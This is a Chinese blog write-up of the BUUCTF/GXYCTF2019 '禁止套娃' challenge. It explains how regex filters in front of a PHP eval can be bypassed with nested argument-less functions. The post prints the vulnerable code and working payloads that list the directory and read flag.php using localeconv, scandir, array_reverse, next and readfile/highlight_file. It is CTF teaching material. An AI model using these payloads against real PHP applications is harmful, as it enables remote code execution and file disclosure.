无参数RCE

最新推荐文章于 2024-04-07 20:56:09 发布
最新推荐文章于 2024-04-07 20:56:09 发布
阅读量2.1k 收藏 1
点赞数 3
分类专栏: 渗透测试 BUUCTF RCE 文章标签: php RCE 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58784379/article/details/120584774
版权
渗透测试 同时被 3 个专栏收录
82 篇文章 18 订阅
订阅专栏
BUUCTF
30 篇文章 0 订阅
订阅专栏
RCE
10 篇文章 0 订阅
订阅专栏

 [GXYCTF2019]禁止套娃

<?php
include "flag.php";//执行并包含flag.php
echo "flag在哪里呢?<br>";
if(isset($_GET['exp'])){//以get方式提交exp,非空且为字符串
    if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
        if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
            if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
                // echo $_GET['exp'];
                @eval($_GET['exp']);
            }
            else{
                die("还差一点哦!");
            }
        }
        else{
            die("再好好想想!");
        }
    }
    else{
        die("还想读flag,臭弟弟!");
    }
}
// highlight_file(__FILE__);
?>

第一个

正则表达式将会过滤data://,filter://,php://,phar://等伪协议读取flag.php

php中的!号作用通俗点理解就是否定的意思 比如: a==b 表示a要等于b, !a==b 表示a不等于b

pret_match()函数是正则表权达式匹配, 匹配成功就返回true, 匹配不成功就返回false 前面加个!那就需要这个函数返回false, 也就是没有匹配上

第二个

preg_replace()函数,preg_replace('/[a-z,]+((?R)?)/', NULL, $GET['exp']),主要功能就是限制我们传输进来的必须是纯小写字母的函数,而且不能携带参数

第三个

则直白的过滤了et|na|info|dec|bin|hex|oct|pi|log

一三两个规则很好理解,关键在于第二个preg_replace()函数的具体作用,也就是无参数函数校验

什么是无参数函数RCE

当我们有eval($_GET['exp']);时,代表着拥有了一句话木马,可以getshell,但是如果有以下限制时,我们使用的参数则无法通过校验

if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {    
    eval($_GET['exp']);
}

preg_replace()函数,将会执行一个正则表达式的搜索与替换,当$pattern也就是/[a-z,_]+((?R)?)/时,替换为null值,这里需要传入的参数为小写字母,且不能携带参数。只能匹配通过无参数的函数

“+”表示匹配前面的子表达式一次或多次(大于等于1次)。例如,“gy+”能匹配“gy”以及“gyy”

(?R) : 表示当前表达式(/[a-z,_]+((?R)?)/)一直递归

(?R)?表示递归整个匹配模式零次或者一次

所以preg_replace('/[a-z,]+((?R)?)/', NULL, $GET['exp'])大致含义就是匹配无参数的函数,但是内部可以无限嵌套相同的模式

print_r(scandir('a()'));可以执行
print_r(scandir('a(b(c()))'));可以执行
print_r(scandir('123'));不可以执行
___________________________________________________________
所以这个正则只会匹配到
a();
a(b(c()));
带上参数比如system('ls /');是无法执行的,我们只能使用没有参数的函数来进行远程代码执行

在phpstudy的www下创建一个php文件:

<?php
print_r(scandir('.'));
?>

访问:

既然这样,利用scandir('.')即可尝试查看flag,可惜失败了

scandir() 读取当前目录下的所有文件,但是由于只能使用没有参数的函数来进行远程代码执行,那么'.'如何绕过呢?

这里引入两个函数

  1. localeconv() 函数返回一包含本地数字及货币格式信息的数组。而数组第一项就是.

  2. current()函数 返回数组中的当前单元, 默认取第一个值

  3. 将第一个函数套入第二个函数,也就是current(localeconv()),这样就永远返回'.'

构造payload:

?exp=print_r(scandir(current(localeconv())));

既然查看到flag.php在倒数第二个数组内,只要解决如何查看的问题即可提交flag

  1. array_reverse()以相反的元素顺序返回数组

  2. next()函数将数组中内部指针向前移动一位

构造payload:

?exp=print_r(next(array_reverse(scandir(current(localeconv())))));

如何读取flag?

  1. readfile()

  2. highlight_file()

构造payload(都可得flag):

  1. ?exp=print_r(readfile(next(array_reverse(scandir(current(localeconv()))))));

  2. ?exp=highlight_file(next(array_reverse(scandir(current(localeconv())))));

bbb07
关注
专栏目录
【网络安全 | 代码审计】PHP参数RCE
等风来
09-17 1138
一般情况下,RCE需要通过传递特定的输入(如URL参数、POST请求数据、表单数据等)来触发漏洞并执行恶意代码。而无参数RCE是一种特殊的远程代码执行漏洞,它的特点是通过调用多个函数(或利用系统中已有的代码路径)来实现远程代码执行,而无需显式的参数
php参数函数实现rce,浅谈无参数RCE
weixin_30568317的博客
04-02 2002
0x00 前言这几天做了几道无参数RCE的题目,这里来总结一下,以后忘了也方便再捡起来。首先先来解释一下什么是无参数RCE:形式:if(';' === preg_replace('/[^W]+((?R)?)/', '', $_GET['code'])) { eval($_GET['code']);}preg_replace('/[a-z]+((?R)?)/', NULL, $code)pre_ma...
初探无参数RCE
weixin_46330722的博客
12-07 2850
概念 所谓无参数RCE,就是通过没有参数的函数达到命令执行的目的。这类题目的关键代码一般长这样,后面都用这串代码当题目测试 <?php if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['exp'])) { eval($_GET['exp']); } ?> 简单解释一下这串代码。这串代码就是检查了我们通过GET方式传入的exp参数的值,如果传进去的值是传进去的值是一个字符串接一个(),那么这个字符串就会被替换为空
参数rce
qq_45570082的博客
06-07 2116
总结一下无参数rce的各种解法(为了便于自己查找,同时为了把自己收藏夹的几个相关网址删掉,每次都在别人博客找很麻烦的(手动狗头)) 首先准备代码 <?php if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['a'])) { eval($_GET['a']);} 利用session_id php中有一个函数叫session_id(),可以直接获取到cookie中的phpsessionid值,phpsessionid的组成符号有
参数绕过RCE
最新发布
m0_73756016的博客
04-07 1074
顾名思义,就是只使用函数,且函数不能带有参数,这里有种种限制:比如我们选择的函数必须能接受其括号内函数的返回值;使用的函数规定必须参数为空或者为一个参数等无参数题目特征if(';R)?代码解析这里使用替换匹配到的字符为空,\w匹配字母、数字和下划线,等价于,然后R)?这个意思为递归整个匹配模式eg:[^\W]+\(?\)匹配到"a()"形式的字符串,但是()不能内出现任何参数(?R)代表递归,即a(b(c()))都能匹配到使用该正则表达式进行替换后,每个函数调用都会被删除,只剩下一个分号;
参数RCE知识点
m0_75178803的博客
12-12 812
无参rce,就是说在无法传入参数的情况下,仅仅依靠传入没有参数的函数套娃就可以达到命令执行的效果。
参数 rce.md
04-01
记录一下,关于这次比赛的 wp >.< 并向大佬们积极学习 >.< 顺便混点分
参数函数RCE
weixin_53146913的博客
07-19 2074
1.利用超全局变量进行bypass,进行RCE 2.进行任意文件读取
RCE参数构造
nobugnomoney的博客
05-24 1479
一、RCE参数构造 无参rce,就是说在无法传入参数的情况下,仅仅依靠传入没有参数的函数套娃就可以达到命令执行的效果,这在ctf中也算是一个比较常见的考点,接下来就来详细总结总结它的利用姿势。 核心的代码 if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) { eval($_GET['code']); } 也就是说只能传入函数(),但是()里面能有参数,要是有参数的话最终的返回值不是;就不能进行匹配。例如传入A
初学无参数RCE
m0_62709637的博客
05-12 543
前置知识: 1、文件读取函数: show_source(): highlight_file():对文件进行语法高亮显示; readfile(): file_get_contents(): file(): tips:show_source()和highlight_file()函数无法直接在页面输出需要配合echo()等函数一同使用; 2、写题时常用的输出函数: print_r(): var_dump(): echo(): 3、无参数rce常见正则匹配 1、'/[^\W]+\((?R)?\
无参函数的RCE
silence1_的博客
10-31 2468
无参函数的RCE 最近遇到挺多rce的题,这里记录一下关于无参函数的rce。 先看看代码: <?php if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) { eval($_GET['code']); } else { show_source(__FILE__); } ?> 很明了,...
无参 RCE
snowlyzz的博客
08-07 647
无参rce
Byte CTF boring_code(fuzz,无参数RCE)
a3320315的博客
11-09 2013
0x01 贴出代码 <?php function is_valid_url($url) { if (filter_var($url, FILTER_VALIDATE_URL)) { if (preg_match('/data:\/\//i', $url)) { return false; } return true; } return false; } if (is...
php参数函数实现rce,PHP Parametric Function RCE
weixin_42303721的博客
04-02 596
前言最近做了一些 php参数函数执行的题目,这里做一个总结,以便以后 bypass 各种正则过滤。大致思路如下:1. 利用超全局变量进行 bypass,进行 RCE2. 进行任意文件读取什么是无参数函数 RCE传统意义上,如果我们有:eval ( $_GET [ ’ code ’ ] ) ;即代表我们拥有了 " 一句话木马 ",可以进行 getshell,例如:但是如果有如下限制:if ( ’...
深入浅出带你学习无参RCE
老司机的后备箱
02-16 757
最近找到一个VUE的文档,它将VUE的各个知识点进行了总结,整理成了《Vue 开发必须知道的36个技巧》。内容比较详实,对各个知识点的讲解也十分到位。
参数RCE:利用session_id实现远程代码执行
在实际的安全环境中,防止无参数RCE的关键在于限制用户输入的处理方式,避免直接执行未经验证的代码,以及确保敏感函数如`eval`不会被滥用。同时,正确配置和使用session管理对于防止这类攻击至关重要。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值